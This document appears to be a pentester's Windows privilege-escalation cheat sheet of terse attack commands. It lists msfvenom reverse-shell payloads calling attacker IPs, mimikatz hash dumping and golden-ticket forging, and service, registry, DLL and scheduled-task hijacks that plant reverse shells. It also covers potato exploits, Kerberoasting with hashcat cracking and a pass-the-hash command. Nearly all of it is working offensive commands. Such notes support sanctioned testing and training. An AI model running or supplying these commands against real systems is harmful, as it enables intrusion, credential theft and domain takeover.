Privesc
Powerview
Start Powershell - powershell -ep bypass -ep bypasses the execution policy of powershell allowing you to easily run scripts
powershell -ep bypass
Start PowerView
. .\PowerView.ps1
Enumerate the domain users -
Get-NetUser | select cn
Enumerate the domain groups
Get-NetGroup -GroupName *admin*
Enumerate shared folder
Invoke-ShareFinder
Enumerate operation systems inside of domain
Get-NetComputer -fulldata | select operatingsystem
Additional queries
https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
PowerUp a powershell script
https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1
To execute this using Meterpreter, I will type load powershell into meterpreter. Then I will enter powershell by entering powershell_shell:
powershell -exec bypass
. .\PowerUp.ps1
Invoke-AllChecks
This script is useful but requires PowerShell. If you are to use this script I advise using a one-off PowerShell command. For example:
powershell.exe -exec bypass -Command “& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}”
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.27.83 LPORT=4443 -e x86/sjikata -
f exe -o Advanced.exe
Encoded payload
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai
LHOST=10.11.9.134 LPORT=9091 -f exe -o bruce.exe
Sherlock PowerShell script exploit suggester
Edit Sherlock.ps1 file and add line at the end.
...
Find-AllVulns
BloodHound
neo4j console
bloodhound
powershell -ep bypass
.\Downloads\SharpHound.ps1
Invoke-Bloodhound -CollectionMethod All -Domain DOMAIN.local -ZipFileName loot.zip
OR (alternative)
SharpHound.exe
Upload zip file into bloodhound.
Mimikatz
Load mimikatz.
privilege::debug
This ensures that you're running mimikatz as an administrator; if you don't run mimikatz as an administrator, mimikatz will not run properly.
Dump hashes
lsadump::lsa /patch
Login passwords
mimikatz # sekurlsa::logonpasswords
Take hashes offline and crack the hashes or run attacks like pass the hash.
Golden Ticket
Load mimikatz.
privilege::debug
lsadump::lsa /inject /name:krbtgt
This dumps the hash and security identifier of the Kerberos Ticket Granting Ticket account allowing you to create a golden ticket.
Copy the SID of the domain and the NTLM hash of the ticket granting ticket account
kerberos::golden /User:Administrator /domain:marvel.local /sid:SID /krbtgt:NTLMHASH /id:500 /ptt
After passing the ticket successfuly open a new session (on the mimikatz prompt)
misc::cmd
Access other Machines! - You will now have another command prompt with access to all other machines on the network.
Service Exploits
Let's start by looking for non-default services:
wmic service get name,displayname,pathname,startmode | findstr /v /i "C:\Windows"
To verify service permissions
.\accesschk.exe /accepteula -uwcqv user daclsvc
Query service configuration
sc qc daclsvc
Check service status
sc query daclsvc
Unquoted Path Service
To check permissions to start the service
.\accesschk.exe /accepteula -ucqv user unquotedsvc
Check folder for write permissions
.\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"
Exploit
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.149.131 LPORT=9002 -f exe > Wise.exe
or
powershell "get-acl -Path 'C:\Program Files (x86)\System Explorer' | format-list"
Paste exploit in that directory
net start unquotedsvc
Weak Registry Permissions
If we can modify the registry of a service. Ex: HKLM\system\currentcontrolset\services\regsvc
Check permissions
.\accesschk.exe /accepteula -uvwqk HKLM\system\currentcontrolset\services\regsvc
Check the value of the registry entry
reg query HKLM\system\currentcontrolset\services\regsvc
Change the path of the value to a reverse shell
reg add HKLM\system\currentcontrolset\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f
net start regsvc
Startup Apps
.\accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
Check for Write access.
Create a shortcut to the exploit. There is a script already available in the privesc files.
type CreateShortcut.vbs
cscript CreateShortcut.vbs
Start listener
Logout and Log back in as the admin user.
icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
If the group has full access (F) then we simply upload a rev shell on this folder and wait for a login/reboot.
Insecure Service Executables
.\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"
To check permissions to start the service
.\accesschk.exe /accepteula -ucqv user filepermsvc
Backup the original service executable
copy "C:\Program Files\File Permissions Service\filepermservice.exe" C:\Temp
copy /Y C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe"
net start filepermsvc
Escalation via binary paths
.\accesschk.exe /accepteula -uwcv Everyone *
To check permissions to start the service and change the config (SERVICE_QUERY_CONFIG)
.\accesschk.exe /accepteula -uwcv daclsvc (name of the service found)
See current configuration
sc qc daclsvc
sc config daclsvc binpath="net localgroup admnistrators user /a"
sc stop daclsvc
sc start daclsvc
DLL Hijacking
Check for folders that are writable and in the PATH
Check for the executables
sc qc dllsvc
Start Procmon to analyse .exe
Check what dll the .exe is calling
Generate a reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=9001 -f dll -o /tools/hijackme.dll
copy \\192.168.1.11\tools\hijackme.dll C:\Temp
net stop dllsvc
net start dllsvc
Registry exploits
AutoRuns
winPEAS.exe quiet applicationsinfo
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Copy exploit to path of the .exe
Restart windows
Always Install Elevated
winPEAS.exe quiet windowscreds
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
msfvenom -p windows/meterpreter/reverse_tcp lhost=(ATTACKER IP ADDRESS) lport=(ATTACKER PORT) –f msi > install.msi
msiexec /quiet /qn /i install.msi
Scheduled Tasks
schtasks /query /fo LIST /v
Find script that is being executed and write to it
echo C:\PrivEsc\reverse.exe >> CleanUp.ps1
Runas (Stored Credentials)
Identifying Stored Credentials
cmdkey /list
runas /savecred /user:WORKGROUP\Administrator "C:\Users\ignite\Downloads\shell.exe"
Token Impersonation with Incognito
msfconsole
user windows/smb/psexec
set rhosts
set smbdomain
set smbpass
set smbuser
show targets
set targets 2 (native upload)
set payload windows/x64/meterpreter/reverse_tcp
set lhost
set lport
On a meterpreter shell load incognito
load incognito
list_tokens -u
impersonate_token token\name
rev2self on meterpreter (reverts back to the initial permissions)
Hot Potato
Needs hot potato.exe
.\potato.exe -ip 192.168.1.33 -cmd "C:\PrivEsc\reverse.exe" -enable_http server true -enable_defender true -enable_spoof true -enable_exhaust true
Juicy Potato
Needs hot potato.exe
pwd of the reverse.exe
.\PSExec64.exe -accepteula -i -u "nt authority\local service" reverse.exe
To have a shell as the local service account
C:\PrivEsc\JuicyPotato.exe -l 1337 -p C:\PrivEsc\reverse.exe -t * -c {03... CLSID of the Windows version}
https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/juicypotato
Kerberoasting
ASReproasting occurs when a user account has the privilege "Does not require Pre-Authentication" set. This means that the account does not need to provide valid identification before requesting a Kerberos Ticket on the specified user account.
Impacket has a tool called "GetNPUsers.py" (located in Impacket/Examples/GetNPUsers.py) that will allow us to query ASReproastable accounts from the Key Distribution Center. (Enumerate valid users with kerbrute)
GetNPUsers.py spookysec.local/ -usersfile userlist.txt
GetNPUsers.py spookysec.local/svc-admin -no-pass
Once we have user credentials we can retrieve services with administrator accounts (SPN)
Using the GetUserSPNS.py (impacket)
GetUserSPNS.py domain.local/user:password -dc-ip 192.168.57.140 -request
GetUserSPNS.py -request -dc-ip IP TARGET(domain/user)
impacket-GetUsersSPNs -dc-ip IP DOMAIN/User
Enter the password
Or
GetUserSPNs.py controller.local/Machine1:Password1 -dc-ip 10.10.117.212 -request
Find hashcat hash type
hashcat --1 help | grep Kerberos
hashcat -m 13100 hashes4.txt rockyou.txt -O
Abusing Token Privileges For Windows Local Privilege Escalation
While using meterpreter
ps shows all of the running processes
meterpreter > migrate PID
to migrate to a higher authority process(ex: spoolsv.exe)
meterpreter > load kiwi
to load mimikatz
TODO: Good reads
https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/
https://foxglovesecurity.com/2017/08/25/abusing-token-privileges-for-windows-local-privilege-escalation/
Windows-Exploit-Suggester
update the database
$ ./windows-exploit-suggester.py --update
install dependencies
(install python-xlrd, $ pip install xlrd --upgrade)
feed it "systeminfo" input, and point it to the microsoft database
$ ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt
Windows-Exploit-Suggester GitHub
Pass the hash attack
pth-winexe -U administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 //IP cmd.exe
Privilege Escalation Awesome Scripts SUITE
Additional reading
FuzzySecurity | Windows Privilege Escalation Fundamentals
FuzzySecurity | Windows Privilege Escalation FundamentalsFuzzySecurity | Windows Privilege Escalation Fundamentals
Windows Privilege Escalation Guide